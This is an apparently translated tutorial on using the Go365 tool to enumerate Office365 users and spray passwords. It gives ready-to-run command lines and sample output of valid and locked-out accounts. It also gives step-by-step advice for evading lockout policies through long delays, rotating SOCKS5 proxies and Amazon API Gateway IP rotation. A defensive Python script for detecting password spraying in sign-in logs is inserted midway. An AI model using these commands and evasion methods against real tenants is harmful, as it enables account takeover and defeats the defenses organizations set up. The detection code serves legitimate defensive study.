
How to use Go365 to infiltrate Office365 users

2025-01-19 Update From: SLTechnology News&Howtos

Shulou (Shulou.com) 06/03

This article introduces how to use Go365 to infiltrate Office365 users. Many people run into this situation in real engagements, so the editor will walk you through how to handle it. Please read carefully.

Preface

Go365 is a tool designed to help researchers perform user enumeration and password guessing attacks against organizations and users who use Office365 (now / soon). Go365 uses a unique SOAP API endpoint on login.microsoftonline.com that most other tools do not use. When queried with an email address and password, the endpoint responds with an Azure AD authentication and authorization code, which Go365 then processes; the result is printed to the screen or written to an output file.

User enumeration and password guessing are performed at the same time; Go365 provides no parameter or function for performing user enumeration only. Each time Go365 makes a password guess, it also determines whether the user identity is valid.

Notes

This tool may not work on all domains that use Office365. Tests show that it works with most federated domains. Some domains report only valid users even when a valid password is provided. Results may vary between scenarios.

Tests of the tool on different domains showed that it did not actually lock the target account after multiple failed password attempts, but results may differ in other scenarios.

This tool is designed to be used by security professionals authorized to "infiltrate" Office365 instances of the target organization.

Usage

Usage examples:

./Go365 -ul ./user_list.txt -p 'passwordbrothers 123' -d pwnthisfakedomain.com
./Go365 -ul ./user_list.txt -p 'passwordbrothers 123' -d pwnthisfakedomain.com -w 5
./Go365 -up ./userpass_list.txt -d pwnthisfakedomain.com -w 5 -o Go365output.txt
./Go365 -u legituser@pwnthisfakedomain.com -p 'passwordbrothers 123' -w 5 -o Go365output.txt -proxy 127.0.0.1:1080
./Go365 -u legituser -pl ./pass_list.txt -delay 1800 -d pwnthisfakedomain.com -w 5 -o Go365output.txt -proxyfile ./proxyfile.txt
./Go365 -ul ./user_list.txt -p 'password password 123' -d pwnthisfakedomain.com -w 5 -o Go365output.txt -url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login

Account lockout (domain defense policy)

Note: the target accounts are probably not actually being locked.

After multiple queries against the target domain, the tool may begin to report that target accounts are locked.

Once the domain defense policy is triggered, user enumeration results become less reliable, because requests for both valid and invalid users randomly report that the account is locked.

...
[-] User not found: test.user90@pwnthisfakedomain.com
[-] User not found: test.user91@pwnthisfakedomain.com
[-] Valid user, but invalid password: test.user92@pwnthisfakedomain.com
[!] Account Locked Out: real.user1@pwnthisfakedomain.com
[-] Valid user, but invalid password: test.user93@pwnthisfakedomain.com
[!] Account Locked Out: valid.user94@pwnthisfakedomain.com
[!] Account Locked Out: jane.smith@pwnthisfakedomain.com
[-] Valid user, but invalid password: real.user95@pwnthisfakedomain.com
[-] Valid user, but invalid password: fake.user96@pwnthisfakedomain.com
[!] Account Locked Out: valid.smith@pwnthisfakedomain.com
...

This is a defense mechanism, which will be triggered if the number of valid user queries for the target domain reaches the threshold within a certain period of time. Because the target organization can customize this threshold, the number of attempts and time period will vary from target domain to target domain.
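From the defender's side, the same pattern (failed sign-ins spread over many distinct accounts in a short period) can be flagged in sign-in logs. The following is an added example, not code from the original article or from the Go365 project: the record layout, thresholds and sample events are constructed, and the result codes are Azure AD sign-in error codes. It counts distinct users per source IP and also across all sources combined, since a per-IP count alone says nothing when the requests arrive from many addresses.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Azure AD sign-in error codes that mark a failed password attempt:
# 50034 user not found, 50126 invalid credentials, 50053 account locked.
FAILURE_CODES = {"50034", "50126", "50053"}


def build_sample():
    """Constructed records: (timestamp, source_ip, user, result_code)."""
    t0 = datetime(2025, 1, 19, 9, 0, 0)
    events = []
    # One source walks through six accounts, 15 s apart.
    for i in range(6):
        code = "50126" if i % 2 else "50034"
        events.append((t0 + timedelta(seconds=15 * i), "198.51.100.7",
                       f"test.user{i}@example.com", code))
    # A single user mistypes a password, then signs in (code 0 = success).
    events.append((t0 + timedelta(hours=1), "192.0.2.10", "jane@example.com", "50126"))
    events.append((t0 + timedelta(hours=1, seconds=20), "192.0.2.10", "jane@example.com", "0"))
    # Eight accounts fail within four minutes, each from a different source.
    for i in range(8):
        events.append((t0 + timedelta(hours=2, seconds=30 * i), f"203.0.113.{i + 1}",
                       f"real.user{i}@example.com", "50126"))
    return events


def detect_spray(events, window=timedelta(minutes=10), per_ip=5, tenant_wide=8):
    """Alert once per key when failures in the window span enough distinct users.

    The key is a source IP, or "*" for all sources combined.
    """
    queues = defaultdict(deque)
    fired, alerts = set(), []
    for ts, ip, user, code in sorted(events):
        if code not in FAILURE_CODES:
            continue
        for key, limit in ((ip, per_ip), ("*", tenant_wide)):
            q = queues[key]
            q.append((ts, user))
            while ts - q[0][0] > window:  # drop entries older than the window
                q.popleft()
            distinct = len({u for _, u in q})
            if distinct >= limit and key not in fired:
                fired.add(key)
                alerts.append((key, ts, distinct))
    return alerts


if __name__ == "__main__":
    for key, ts, n in detect_spray(build_sample()):
        print(f"{ts:%H:%M:%S} source={key} distinct_users={n}")
```

The single user who mistypes a password raises no alert, because the count is over distinct accounts rather than raw failures.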

Response strategy

Wait delay

This defense mechanism is implemented based on time and IP addresses, while Go365 provides options to include wait time between requests and proxy options to distribute the request source. To circumvent the defense mechanism on the target domain, use a long wait time and multiple proxy servers.

It is recommended to wait at least 15 seconds:

-w 15

SOCKS5 proxy

If you still receive an "account locked" response, you need to send the requests through a proxy. The proxy option has currently only been tested with an SSH SOCKS5 dynamic proxy (ssh -D user@proxyserver).

You can create SOCKS5 proxies on platforms such as DO, AWS, or Vultr, and then create a file that contains data in the following format:

127.0.0.1:8081
127.0.0.1:8082
127.0.0.1:8083
127.0.0.1:8084
127.0.0.1:8085
127.0.0.1:8086
...

The tool randomly iterates over the provided proxy servers and waits for the specified delay between requests.

-w 15 -proxyfile ./proxies.txt

Amazon API Gateway

In addition, an endpoint URL can be specified so that the tool interacts with Amazon API Gateway. Set up a gateway that points to the https://login.microsoftonline.com/rst2.srf endpoint, and then set the -url parameter to the gateway's invoke URL. The source IP address should then rotate with each request:

-url https://k62g98dne3.execute-api.us-east-2.amazonaws.com/login

This concludes the introduction to "how to use Go365 to infiltrate Office365 users". Thank you for reading.
